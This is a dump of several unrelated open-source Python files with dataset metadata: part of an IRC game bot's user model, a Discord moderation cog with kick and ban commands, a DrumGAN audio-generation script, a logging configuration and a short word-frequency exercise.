def prefers_notice(self):\n return self.lower().account in db.PREFER_NOTICE\n\n def get_pingif_count(self):\n return db.PING_IF_PREFS.get(self.lower().account, 0)\n\n def set_pingif_count(self, value, old=None):\n temp = self.lower()\n\n if not value:\n if temp.account in db.PING_IF_PREFS:\n del db.PING_IF_PREFS[temp.account]\n db.set_pingif(0, temp.account)\n if old is not None:\n if old in db.PING_IF_NUMS:\n db.PING_IF_NUMS[old].discard(temp.account)\n else:\n if temp.account:\n db.PING_IF_PREFS[temp.account] = value\n db.set_pingif(value, temp.account)\n if value not in db.PING_IF_NUMS:\n db.PING_IF_NUMS[value] = set()\n db.PING_IF_NUMS[value].add(temp.account)\n if old is not None:\n if old in db.PING_IF_NUMS:\n db.PING_IF_NUMS[old].discard(temp.account)\n\n def wants_deadchat(self):\n return self.lower().account not in db.DEADCHAT_PREFS\n\n def stasis_count(self):\n \"\"\"Return the number of games the user is in stasis for.\"\"\"\n return db.STASISED.get(self.lower().account, 0)\n\n def update_account_data(self, command: str, callback: Callable):\n \"\"\"Refresh stale account data on networks that don't support certain features.\n\n :param command: Command name that prompted the call to update_account_data.\n Used to handle cases where the user executes multiple commands before\n account data can be updated, so they can all be queued. If the same command\n is given multiple times, we honor the most recent one given. The command\n has a unique suffix so that distinct commands that share names (e.g. wolf kill\n and vg kill) do not cause collisions.\n :param callback: Callback to execute when account data is fully updated,\n passed in the updated user with an accurate account\n \"\"\"\n\n # Nothing to update for fake nicks\n if self.is_fake:\n callback(self)\n return\n\n if self.account and Features.get(\"account-notify\", False):\n # account-notify is enabled, so we're already up to date on our account name\n callback(self)\n return\n\n if self.account and self.account_timestamp > time.time() - 900:\n # account data is less than 15 minutes old, use existing data instead of refreshing\n callback(self)\n return\n\n evt = Event(\"update_account_data\", {})\n if not evt.dispatch(self):\n new_user = get(self.nick, self.ident, self.host, allow_ghosts=True)\n callback(new_user)\n return\n\n if self not in _pending_account_updates:\n _pending_account_updates[self] = CheckedDict(\"users.User.update_account_data\")\n\n _pending_account_updates[self][command] = callback\n\n if len(_pending_account_updates[self].keys()) > 1:\n # already have a pending WHO/WHOIS for this user, don't send multiple to the server to avoid hitting\n # rate limits (if we are ratelimited, that can be handled by re-sending the request at a lower layer)\n return\n\n if Features.get(\"WHOX\", False):\n # A WHOX query performs less network noise than WHOIS, so use that if available\n self.who()\n else:\n # Fallback to WHOIS\n self.client.send(\"WHOIS {0}\".format(self))\n\n @property\n def nick(self): # name should be the same as nick (for length calculation)\n return self.name\n\n @nick.setter\n def nick(self, value):\n new = User(self.client, value, self.ident, self.host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def ident(self):\n return self._ident\n\n @ident.setter\n def ident(self, value):\n new = User(self.client, self.nick, value, self.host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def host(self):\n return self._host\n\n @host.setter\n def host(self, value):\n new = User(self.client, self.nick, self.ident, value, self.account)\n self.swap(new, same_user=True)\n\n @property\n def account(self): # automatically converts \"0\" and \"*\" to None\n return self._account\n\n @account.setter\n def account(self, value):\n if value in (\"0\", \"*\"):\n value = NotLoggedIn\n new = User(self.client, self.nick, self.ident, self.host, value)\n new.account_timestamp = time.time()\n self.swap(new, same_user=True)\n\n @property\n def rawnick(self):\n if self.nick is None or self.ident is None or self.host is None:\n return None\n return \"{self.nick}!{self.ident}@{self.host}\".format(self=self)\n\n @rawnick.setter\n def rawnick(self, value):\n nick, ident, host = parse_rawnick(value)\n new = User(self.client, nick, ident, host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def disconnected(self):\n return self in _ghosts\n\n @disconnected.setter\n def disconnected(self, value):\n if value:\n _ghosts.add(self)\n else:\n _ghosts.discard(self)\n # ensure dangling users aren't left around in our tracking var\n if not self.channels:\n _users.discard(self)\n\n @property\n def game_state(self):\n # There's only ever one game for now, but if/when the bot supports\n # running multiple games simultaneously, we can use this to fetch\n # which game the user is currently playing in (assuming that a\n # user can only belong to one game at a time)\n from src import channels\n return channels.Main.game_state\n\nclass FakeUser(User):\n\n is_fake = True\n\n def __hash__(self):\n return hash(self.nick)\n\n def __format__(self, format_spec):\n if format_spec in (\"for_tb\", \"for_tb_verbose\") and self.nick.startswith(\"@\"):\n # fakes starting with @ are used internally for various purposes (such as @WolvesAgree@)\n # so it'd be good to keep that around when debugging in tracebacks\n return \"{self.__class__.__name__}({self.nick!r})\".format(self=self)\n return super().__format__(format_spec)\n\n @classmethod\n def from_nick(cls, nick):\n return FakeUser(None, nick, None, None, None)\n\n @property\n def nick(self):\n return self.name\n\n @nick.setter\n def nick(self, value):\n raise ValueError(\"may not change the nick of a fake user\")\n\n @property\n def rawnick(self):\n return self.nick # we don't have a raw nick\n\n @rawnick.setter\n def rawnick(self, value):\n raise ValueError(\"may not change the raw nick of a fake user\")\n\nclass BotUser(User): # TODO: change all the 'if x is Bot' for 'if isinstance(x, BotUser)'\n\n def __init__(self, cli, nick, ident, host, account):\n if not self._initialized:\n self.modes = set()\n super().__init__(cli, nick, ident, host, account)\n\n def change_nick(self, nick=None):\n if nick is None:\n nick = self.nick\n self.client.send(\"NICK\", nick)\n\n @property\n def nick(self): # name should be the same as nick (for length calculation)\n return self.name\n\n @nick.setter\n def nick(self, value):\n self.client.nickname = value\n new = BotUser(self.client, value, self.ident, self.host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def ident(self):\n return self._ident\n\n @ident.setter\n def ident(self, value):\n self.client.ident = value\n new = BotUser(self.client, self.nick, value, self.host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def host(self):\n return self._host\n\n @host.setter\n def host(self, value):\n self.client.hostmask = value\n new = BotUser(self.client, self.nick, self.ident, value, self.account)\n self.swap(new, same_user=True)\n\n @property\n def account(self): # automatically converts \"0\" and \"*\" to None\n return self._account\n\n @account.setter\n def account(self, value):\n if value in (\"0\", \"*\"):\n value = NotLoggedIn\n new = BotUser(self.client, self.nick, self.ident, self.host, value)\n self.swap(new, same_user=True)\n\n @property\n def rawnick(self):\n if self.nick is None or self.ident is None or self.host is None:\n return None\n return \"{self.nick}!{self.ident}@{self.host}\".format(self=self)\n\n @rawnick.setter\n def rawnick(self, value):\n nick, ident, host = parse_rawnick(value)\n self.client.nickname = nick\n self.client.ident = ident\n self.client.hostmask = host\n new = BotUser(self.client, nick, ident, host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def disconnected(self):\n return False\n\n @disconnected.setter\n def disconnected(self, value):\n pass # no-op\n\n @property\n def game_state(self):\n # PMs to the bot should use the source's game state for disambiguation\n return None\n","repo_name":"lykoss/lykos","sub_path":"src/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":30680,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"21"} +{"seq_id":"42576386876","text":"import asyncio, discord, re, random\r\nfrom operator import itemgetter\r\nfrom discord.ext import commands\r\nfrom Cogs import Utils, DisplayName, Message, PickList\r\n\r\ndef setup(bot):\r\n\t# Add the bot and deps\r\n\tsettings = bot.get_cog(\"Settings\")\r\n\tbot.add_cog(BotAdmin(bot, settings))\r\n\r\nclass BotAdmin(commands.Cog):\r\n\r\n\t# Init with the bot reference, and a reference to the settings var\r\n\tdef __init__(self, bot, settings):\r\n\t\tself.bot = bot\r\n\t\tself.settings = settings\r\n\t\tself.dregex = re.compile(r\"(?i)(discord(\\.gg|app\\.com)\\/)(?!attachments)([^\\s]+)\")\r\n\t\tself.mention_re = re.compile(r\"[0-9]{17,21}\")\r\n\t\tglobal Utils, DisplayName\r\n\t\tUtils = self.bot.get_cog(\"Utils\")\r\n\t\tDisplayName = self.bot.get_cog(\"DisplayName\")\r\n\r\n\tasync def message(self, message):\r\n\t\t# Check for discord invite links and remove them if found - per server settings\r\n\t\tif not self.dregex.search(message.content): return None # No invite in the passed message - nothing to do\r\n\t\t# Got an invite - let's see if we care\r\n\t\tif not self.settings.getServerStat(message.guild,\"RemoveInviteLinks\",False): return None # We don't care\r\n\t\t# We *do* care, let's see if the author is admin/bot-admin as they'd have power to post invites\r\n\t\tctx = await self.bot.get_context(message)\r\n\t\tif Utils.is_bot_admin(ctx): return None # We are immune!\r\n\t\t# At this point - we need to delete the message\r\n\t\treturn { 'Ignore' : True, 'Delete' : True}\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def removeinvitelinks(self, ctx, *, yes_no = None):\r\n\t\t\"\"\"Enables/Disables auto-deleting discord invite links in chat (bot-admin only).\"\"\"\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\t\tawait ctx.send(Utils.yes_no_setting(ctx,\"Remove discord invite links\",\"RemoveInviteLinks\",yes_no))\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def setuserparts(self, ctx, member : discord.Member = None, *, parts : str = None):\r\n\t\t\"\"\"Set another user's parts list (owner only).\"\"\"\r\n\t\t# Only allow owner\r\n\t\tisOwner = self.settings.isOwner(ctx.author)\r\n\t\tif isOwner == None:\r\n\t\t\tmsg = 'I have not been claimed, *yet*.'\r\n\t\t\treturn await ctx.send(msg)\r\n\t\telif isOwner == False:\r\n\t\t\tmsg = 'You are not the *true* owner of me. Only the rightful owner can use this command.'\r\n\t\t\treturn await ctx.send(msg)\r\n\t\t\t\r\n\t\tif member == None:\r\n\t\t\tmsg = 'Usage: `{}setuserparts [member] \"[parts text]\"`'.format(ctx.prefix)\r\n\t\t\treturn await ctx.send(msg)\r\n\r\n\t\tif type(member) is str:\r\n\t\t\ttry:\r\n\t\t\t\tmember = discord.utils.get(ctx.guild.members, name=member)\r\n\t\t\texcept:\r\n\t\t\t\treturn await ctx.send(\"That member does not exist\")\r\n\r\n\t\tif not parts:\r\n\t\t\tparts = \"\"\r\n\t\t\t\r\n\t\tself.settings.setGlobalUserStat(member, \"Parts\", parts)\r\n\t\tmsg = '*{}\\'s* parts have been set to:\\n{}'.format(DisplayName.name(member), parts)\r\n\t\tawait ctx.send(Utils.suppressed(ctx,msg))\r\n\t\t\r\n\t@setuserparts.error\r\n\tasync def setuserparts_error(self, error, ctx):\r\n\t\t# do stuff\r\n\t\tmsg = 'setuserparts Error: {}'.format(error)\r\n\t\tawait ctx.send(msg)\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def ignore(self, ctx, *, member = None):\r\n\t\t\"\"\"Adds a member to the bot's \"ignore\" list (bot-admin only).\"\"\"\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\t\t\t\r\n\t\tif member == None:\r\n\t\t\tmsg = 'Usage: `{}ignore [member]`'.format(ctx.prefix)\r\n\t\t\treturn await ctx.send(msg)\r\n\r\n\t\tif type(member) is str:\r\n\t\t\tmemberName = member\r\n\t\t\tmember = DisplayName.memberForName(memberName, ctx.guild)\r\n\t\t\tif not member:\r\n\t\t\t\tmsg = 'I couldn\\'t find *{}*...'.format(memberName)\r\n\t\t\t\treturn await ctx.send(Utils.suppressed(ctx,msg))\r\n\r\n\t\tignoreList = self.settings.getServerStat(ctx.guild, \"IgnoredUsers\")\r\n\r\n\t\tfor user in ignoreList:\r\n\t\t\tif str(member.id) == str(user[\"ID\"]):\r\n\t\t\t\t# Found our user - already ignored\r\n\t\t\t\treturn await ctx.send('*{}* is already being ignored.'.format(DisplayName.name(member)))\r\n\t\t# Let's ignore someone\r\n\t\tignoreList.append({ \"Name\" : member.name, \"ID\" : member.id })\r\n\t\tself.settings.setServerStat(ctx.guild, \"IgnoredUsers\", ignoreList)\r\n\r\n\t\tawait ctx.send('*{}* is now being ignored.'.format(DisplayName.name(member)))\r\n\t\t\r\n\t@ignore.error\r\n\tasync def ignore_error(self, error, ctx):\r\n\t\t# do stuff\r\n\t\tmsg = 'ignore Error: {}'.format(error)\r\n\t\tawait ctx.send(msg)\r\n\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def listen(self, ctx, *, member = None):\r\n\t\t\"\"\"Removes a member from the bot's \"ignore\" list (bot-admin only).\"\"\"\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\t\t\t\r\n\t\tif member == None:\r\n\t\t\treturn await ctx.send('Usage: `{}listen [member]`'.format(ctx.prefix))\r\n\r\n\t\tif type(member) is str:\r\n\t\t\tmemberName = member\r\n\t\t\tmember = DisplayName.memberForName(memberName, ctx.guild)\r\n\t\t\tif not member:\r\n\t\t\t\tmsg = 'I couldn\\'t find *{}*...'.format(memberName)\r\n\t\t\t\treturn await ctx.send(Utils.suppressed(ctx,msg))\r\n\r\n\t\tignoreList = self.settings.getServerStat(ctx.guild, \"IgnoredUsers\")\r\n\r\n\t\tfor user in ignoreList:\r\n\t\t\tif str(member.id) == str(user[\"ID\"]):\r\n\t\t\t\t# Found our user - already ignored\r\n\t\t\t\tignoreList.remove(user)\r\n\t\t\t\tself.settings.setServerStat(ctx.guild, \"IgnoredUsers\", ignoreList)\r\n\t\t\t\treturn await ctx.send(\"*{}* is no longer being ignored.\".format(DisplayName.name(member)))\r\n\r\n\t\tawait ctx.send('*{}* wasn\\'t being ignored...'.format(DisplayName.name(member)))\r\n\t\t\r\n\t@listen.error\r\n\tasync def listen_error(self, error, ctx):\r\n\t\t# do stuff\r\n\t\tmsg = 'listen Error: {}'.format(error)\r\n\t\tawait ctx.send(msg)\r\n\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def ignored(self, ctx):\r\n\t\t\"\"\"Lists the users currently being ignored.\"\"\"\r\n\t\tignoreArray = self.settings.getServerStat(ctx.guild, \"IgnoredUsers\")\r\n\t\tpromoSorted = sorted(ignoreArray, key=itemgetter('Name'))\r\n\t\tif not len(promoSorted):\r\n\t\t\treturn await ctx.send(\"I'm not currently ignoring anyone.\")\r\n\t\tignored = [\"*{}*\".format(DisplayName.name(ctx.guild.get_member(int(x[\"ID\"])))) for x in promoSorted if ctx.guild.get_member(int(x[\"ID\"]))]\r\n\t\tawait ctx.send(\"Currently Ignored Users:\\n{}\".format(\"\\n\".join(ignored)))\r\n\r\n\t\r\n\tasync def kick_ban(self, ctx, members_and_reason = None, command_name = \"kick\"):\r\n\t\t# Helper method to handle the lifting for kick and ban\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\t\tif not members_and_reason:\r\n\t\t\treturn await ctx.send('Usage: `{}{} [space delimited member mention/id] [reason]`'.format(ctx.prefix, command_name))\r\n\t\t# Force a mention - we don't want any ambiguity\r\n\t\targs = members_and_reason.split()\r\n\t\t# Get our list of targets\r\n\t\ttargets = []\r\n\t\tmissed = []\r\n\t\tunable = []\r\n\t\treason = \"\"\r\n\t\tdays = self.settings.getServerStat(ctx.guild,\"BanMessageRemoveDays\",1) if command_name == \"ban\" else None\r\n\t\ttry: days = int(days)\r\n\t\texcept: days = None\r\n\t\tfooter = \"Message Removal: {:,} day{}\".format(days,\"\" if days==1 else \"s\") if command_name == \"ban\" else None\r\n\t\tfor index,item in enumerate(args):\r\n\t\t\tif self.mention_re.search(item): # Check if it's a mention\r\n\t\t\t\t# Resolve the member\r\n\t\t\t\tmem_id = int(re.sub(r'\\W+', '', item))\r\n\t\t\t\tmember = ctx.guild.get_member(mem_id)\r\n\t\t\t\tif member is None and command_name in (\"ban\",\"unban\"): # Didn't get a valid member, let's allow a pre-ban/unban if we can resolve them\r\n\t\t\t\t\ttry: member = await self.bot.fetch_user(mem_id)\r\n\t\t\t\t\texcept: pass\r\n\t\t\t\t# If we have an invalid mention, save it to report later\r\n\t\t\t\tif member is None:\r\n\t\t\t\t\tmissed.append(str(mem_id))\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t# Let's check if we have a valid member and make sure it's not:\r\n\t\t\t\t# 1. The bot, 2. The command caller, 3. Another bot-admin/admin\r\n\t\t\t\tif isinstance(member, discord.Member) and (member.id == self.bot.user.id or member.id == ctx.author.id or Utils.is_bot_admin(ctx,member)):\r\n\t\t\t\t\tunable.append(member.mention)\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif not member in targets: targets.append(member) # Only add them if we don't already have them\r\n\t\t\telse:\r\n\t\t\t\t# Check if we're banning - and if so, check the rest of the args for `-r=#`\r\n\t\t\t\t# then apply that override and remove from the reason\r\n\t\t\t\tif command_name == \"ban\":\r\n\t\t\t\t\tfor i,x in enumerate(args[index:]):\r\n\t\t\t\t\t\tif x.lower().startswith(\"-r=\"):\r\n\t\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\t\tdays = int(x.split(\"=\")[-1])\r\n\t\t\t\t\t\t\t\tassert 0<=days<8\r\n\t\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\t\targs.pop(index+i)\r\n\t\t\t\t\t\t\tfooter=\"Message Removal Override: {:,} day{}\".format(days,\"\" if days==1 else \"s\")\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t# Bail if we don't have any args left for a reason\r\n\t\t\t\t\tif index >= len(args): break\r\n\t\t\t\t# Not a mention - must be the reason, dump the rest of the items into a string\r\n\t\t\t\t# separated by a space\r\n\t\t\t\treason = \" \".join(args[index:])\r\n\t\t\t\tbreak\r\n\t\treason = reason if len(reason) else \"No reason provided.\"\r\n\t\tif not len(targets):\r\n\t\t\tmsg = \"**With reason:**\\n\\n{}{}{}\".format(\r\n\t\t\t\treason,\r\n\t\t\t\t\"\" if not len(missed) else \"\\n\\n**Unmatched ID{}:**\\n\\n{}\".format(\"\" if len(missed) == 1 else \"s\", \"\\n\".join(missed)),\r\n\t\t\t\t\"\" if not len(unable) else \"\\n\\n**Unable to {}:**\\n\\n{}\".format(command_name,\"\\n\".join(unable))\r\n\t\t\t)\r\n\t\t\treturn await Message.EmbedText(title=\"No valid members passed!\",description=msg,color=ctx.author,footer=footer).send(ctx)\r\n\t\t# We should have a list of targets, and the reason - let's list them for confirmation\r\n\t\t# then generate a 4-digit confirmation code that the original requestor needs to confirm\r\n\t\t# in order to follow through\r\n\t\tconfirmation_code = \"\".join([str(random.randint(0,9)) for x in range(4)])\r\n\t\tmsg = \"**To {} the following member{}:**\\n\\n{}\\n\\n**With reason:**\\n\\n\\\"{}\\\"\\n\\n**Please type:**\\n\\n`{}`{}{}\".format(\r\n\t\t\tcommand_name,\r\n\t\t\t\"\" if len(targets) == 1 else \"s\",\r\n\t\t\t\"\\n\".join([x.name+\"#\"+x.discriminator for x in targets]),\r\n\t\t\treason if len(reason) else \"None\",\r\n\t\t\tconfirmation_code,\r\n\t\t\t\"\" if not len(missed) else \"\\n\\n**Unmatched ID{}:**\\n\\n{}\".format(\"\" if len(missed) == 1 else \"s\", \"\\n\".join(missed)),\r\n\t\t\t\"\" if not len(unable) else \"\\n\\n**Unable to {}:**\\n\\n{}\".format(command_name,\"\\n\".join(unable))\r\n\t\t\t)\r\n\t\tconfirmation_message = await Message.EmbedText(title=\"{} Confirmation\".format(command_name.capitalize()),description=msg,color=ctx.author,footer=footer).send(ctx)\r\n\t\tdef check_confirmation(message):\r\n\t\t\treturn message.channel == ctx.channel and ctx.author == message.author # Just making sure it's the same user/channel\r\n\t\ttry: confirmation_user = await self.bot.wait_for('message', timeout=60, check=check_confirmation)\r\n\t\texcept: confirmation_user = \"\"\r\n\t\t# Delete the confirmation message\r\n\t\tawait confirmation_message.delete()\r\n\t\t# Verify the confirmation\r\n\t\tif not confirmation_user.content == confirmation_code: return await ctx.send(\"{} cancelled!\".format(command_name.capitalize()))\r\n\t\t# We got the authorization!\r\n\t\tmessage = await Message.EmbedText(title=\"{}ing...\".format(\"Bann\" if command_name == \"ban\" else \"Unbann\" if command_name == \"unban\" else \"Kick\"),color=ctx.author,footer=footer).send(ctx)\r\n\t\tcanned = []\r\n\t\tcant = []\r\n\t\tcommand = {\"ban\":ctx.guild.ban,\"kick\":ctx.guild.kick,\"unban\":ctx.guild.unban}.get(command_name.lower(),ctx.guild.kick)\r\n\t\tfor target in targets:\r\n\t\t\ttry:\r\n\t\t\t\targs = {\"reason\":\"{}#{}: {}\".format(ctx.author.name,ctx.author.discriminator,reason)}\r\n\t\t\t\tif days is not None: args[\"delete_message_days\"] = days\r\n\t\t\t\tawait command(target,**args)\r\n\t\t\t\tcanned.append(target)\r\n\t\t\texcept: cant.append(target)\r\n\t\tmsg = \"\"\r\n\t\tif len(canned):\r\n\t\t\tmsg += \"**I was ABLE to {}:**\\n\\n{}\\n\\n\".format(command_name,\"\\n\".join([x.name+\"#\"+x.discriminator for x in canned]))\r\n\t\tif len(cant):\r\n\t\t\tmsg += \"**I was UNABLE to {}:**\\n\\n{}\\n\\n\".format(command_name,\"\\n\".join([x.name+\"#\"+x.discriminator for x in cant]))\r\n\t\tawait Message.EmbedText(title=\"{} Results\".format(command_name.capitalize()),description=msg,footer=footer).edit(ctx,message)\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def kick(self, ctx, *, members = None, reason = None):\r\n\t\t\"\"\"Kicks the passed members for the specified reason.\r\n\t\tAll kick targets must be mentions or ids to avoid ambiguity (bot-admin only).\r\n\t\t\r\n\t\teg: $kick @user1#1234 @user2#5678 @user3#9012 for spamming\"\"\"\r\n\t\tawait self.kick_ban(ctx,members,\"kick\")\r\n\t\t\r\n\t\t\r\n\t@commands.command(pass_context=True)\r\n\tasync def ban(self, ctx, *, members = None, reason = None):\r\n\t\t\"\"\"Bans the passed members for the specified reason.\r\n\t\tAll ban targets must be mentions or ids to avoid ambiguity (bot-admin only).\r\n\t\t\r\n\t\teg: $ban @user1#1234 @user2#5678 @user3#9012 for spamming\r\n\t\t\r\n\t\tCan take '-r=#' within the reason to specify the number of days to remove the banned users' messages.\r\n\t\tThis is limited to 0-7 days, and will override the value set by the rembanmessages command.\r\n\t\t\r\n\t\teg: $ban @user1#1234 @user2#5678 @user3#9012 for spamming -r=5\"\"\"\r\n\t\tawait self.kick_ban(ctx,members,\"ban\")\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def unban(self, ctx, *, members = None, reason = None):\r\n\t\t\"\"\"Unbans the passed members for the specified reason.\r\n\t\tAll unban targets must be mentions or ids to avoid ambiguity (bot-admin only).\r\n\t\t\r\n\t\teg: $unban @user1#1234 @user2#5678 @user3#9012 because we're nice\"\"\"\r\n\t\tawait self.kick_ban(ctx,members,\"unban\")\r\n\r\n\t@commands.command()\r\n\tasync def banned(self, ctx, *, user_id = None):\r\n\t\t\"\"\"Queries the guild's ban list for the passed user id and responds with whether they've been banned and the reason.\r\n\t\tUse with no user_id to show all bans and reasons (bot-admin only).\"\"\"\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\r\n\t\ttry: all_bans = await ctx.guild.bans()\r\n\t\texcept: return await ctx.send(\"I couldn't get the ban list :(\")\r\n\t\t\r\n\t\tif not len(all_bans): return await Message.EmbedText(title=\"Ban List\",description=\"No bans found\",color=ctx.author).send(ctx)\r\n\r\n\t\torig_user = user_id\r\n\t\ttry: user_id = int(user_id) if user_id != None else None\r\n\t\texcept: user_id = -1 # Use -1 to indicate unresolved\r\n\r\n\t\tentries = []\r\n\t\tfor ban in all_bans:\r\n\t\t\tentries.append({\"name\":\"{}#{} ({})\".format(ban.user.name,ban.user.discriminator,ban.user.id),\"value\":ban.reason if ban.reason else \"No reason provided\"})\r\n\t\t\tif user_id != None and user_id == ban.user.id:\r\n\t\t\t\t# Got a match - display it\r\n\t\t\t\treturn await Message.Embed(\r\n\t\t\t\t\ttitle=\"Ban Found For {}\".format(user_id),\r\n\t\t\t\t\tfields=[entries[-1]], # Send the last found entry\r\n\t\t\t\t\tcolor=ctx.author\r\n\t\t\t\t).send(ctx)\r\n\t\tif orig_user is None:\r\n\t\t\t# Just passed None - show the whole ban list\r\n\t\t\treturn await PickList.PagePicker(title=\"Ban List ({:,} total)\".format(len(entries)),list=entries,ctx=ctx).pick()\r\n\t\t# We searched for something and didn't find it\r\n\t\treturn await Message.Embed(title=\"Ban List ({:,} total)\".format(len(entries)),description=\"No match found for '{}'.\".format(orig_user),color=ctx.author).send(ctx)\r\n\r\n\t@commands.command()\r\n\tasync def rembanmessages(self, ctx, number_of_days = None):\r\n\t\t\"\"\"Gets or sets the default number of days worth of messages to remove when banning a user. Must be between 0-7 and uses a default of 1 (bot-admin only).\"\"\"\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\t\tif number_of_days == None: # No setting passed, just output the current\r\n\t\t\tdays = self.settings.getServerStat(ctx.guild,\"BanMessageRemoveDays\",1)\r\n\t\t\treturn await ctx.send(\"Banning a user will remove {:,} day{} worth of messages.\".format(days,\"\" if days==1 else \"s\"))\r\n\t\t# Try to cast the days as an int - and ensure they're between 0 and 7\r\n\t\ttry:\r\n\t\t\tdays = int(number_of_days)\r\n\t\t\tassert 0<=days<8\r\n\t\texcept:\r\n\t\t\treturn await ctx.send(\"Number of days must be an integer between 0 and 7!\")\r\n\t\t# At this point, we should have the default number of days - let's tell the user!\r\n\t\tself.settings.setServerStat(ctx.guild,\"BanMessageRemoveDays\",days)\r\n\t\treturn await ctx.send(\"Banning a user will now remove {:,} day{} worth of messages.\".format(days,\"\" if days==1 else \"s\"))\r\n","repo_name":"scottoss/corpbot.py","sub_path":"Cogs/BotAdmin.py","file_name":"BotAdmin.py","file_ext":"py","file_size_in_byte":15573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2827085572","text":"import os\nimport torch\nimport ipdb\nimport random\n\nfrom datetime import datetime\nfrom .generation_tests import *\n\nfrom utils.utils import mkdir_in_path, load_model_checkp, saveAudioBatch, get_device\nfrom .generation_tests import StyleGEvaluationManager\nfrom data.preprocessing import AudioProcessor\nfrom data.loaders import get_data_loader\n\n\ndef radial_interpolation(z_dim: int, n_samples: int=10):\n fixed_point = torch.randn(z_dim)\n fixed_point = fixed_point / fixed_point.norm()\n z_batch = torch.zeros(n_samples, z_dim)\n\n t = torch.linspace(0.2, 8.0, n_samples)\n for k in range(n_samples):\n z_batch[k] = fixed_point * t[k]\n return z_batch\n\n\ndef generate(parser):\n args = parser.parse_args()\n device = get_device()\n\n model, config, model_name = load_model_checkp(**vars(args))\n latentDim = model.config.noiseVectorDim\n transform_config = config['transform_config']\n loader_config = config['loader_config']\n # We load a dummy data loader for post-processing\n processor = AudioProcessor(**transform_config)\n\n dbname = loader_config['dbname']\n loader_config[\"criteria\"][\"size\"] = 1000\n loader = get_data_loader(dbname)(\n name=dbname + '_' + transform_config['transform'],\n preprocessing=processor, **loader_config)\n\n\n label = torch.Tensor(random.sample(loader.metadata, k=1))\n\n labels, _ = model.buildNoiseData(1, inputLabels=label, skipAtts=True)\n z = labels.repeat(args.n_gen, 1)\n\n z_noise = radial_interpolation(latentDim, args.n_gen)\n\n z[:, :latentDim] = z_noise\n\n gnet = model.getOriginalG()\n gnet.eval()\n with torch.no_grad():\n out = gnet(z.to(device)).detach().cpu()\n\n audio_out = loader.postprocess(out)\n\n # Create output evaluation dir\n output_dir = mkdir_in_path(args.dir, f\"generation_tests\")\n output_dir = mkdir_in_path(output_dir, model_name)\n output_dir = mkdir_in_path(output_dir, \"radial_interpolation\")\n output_dir = mkdir_in_path(output_dir, datetime.now().strftime('%Y-%m-%d %H:%M'))\n\n saveAudioBatch(audio_out,\n path=output_dir,\n basename='test_radial_interpolation', \n sr=config[\"transform_config\"][\"sample_rate\"])\n print(\"FINISHED!\\n\")","repo_name":"SonyCSLParis/DrumGAN","sub_path":"evaluation/gen_tests/radial_interpolation.py","file_name":"radial_interpolation.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"21"} +{"seq_id":"73630615092","text":"################################################################\n# USAGE:\n# from core.logging_config import app_logger\n################################################################\n\n\nimport logging\nimport sys\nfrom logging.handlers import RotatingFileHandler\n\n# Define the basic configuration for logging\nLOGGING_CONFIG = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"default\": {\n \"format\": \"{asctime} - {levelname} - {name} - {message}\",\n \"style\": \"{\",\n },\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"level\": \"DEBUG\",\n \"formatter\": \"default\",\n \"stream\": \"ext://sys.stdout\",\n },\n \"file\": {\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"level\": \"INFO\",\n \"formatter\": \"default\",\n \"filename\": \"logs/app.log\",\n \"maxBytes\": 10485760, # 10MB\n \"backupCount\": 3,\n \"encoding\": \"utf8\",\n },\n },\n \"loggers\": {\n \"uvicorn\": {\n \"handlers\": [\"console\"],\n \"level\": \"INFO\",\n },\n \"fastapi\": {\n \"handlers\": [\"console\", \"file\"],\n \"level\": \"INFO\",\n },\n \"app\": {\n \"handlers\": [\"console\", \"file\"],\n \"level\": \"DEBUG\",\n },\n },\n}\n\n# Apply the logging configuration\nlogging.config.dictConfig(LOGGING_CONFIG)\n\n# Create a custom logger for the application\napp_logger = logging.getLogger(\"app\")\n","repo_name":"llarse/RockPaperScissors_API","sub_path":"app/core/logging_config.py","file_name":"logging_config.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73526709491","text":"# Write a function named frequency_dictionary that takes a list of elements named words as a parameter.\n# The function should return a dictionary containing the frequency of each element in words.\n\n# Write your frequency_dictionary function here:\ndef frequency_dictionary(words):\n # Create empty dictionary\n frequency = {}\n # Iterate through words\n for word in words:\n # Add key value pair of word and its appearances in words\n frequency[word] = words.count(word)\n # Return frequency\n return frequency\n \n# Uncomment these function calls to test your function:\nprint(frequency_dictionary([\"apple\", \"apple\", \"cat\", 1]))\n# should print {\"apple\":2, \"cat\":1, 1:1}\nprint(frequency_dictionary([0,0,0,0,0]))\n# should print 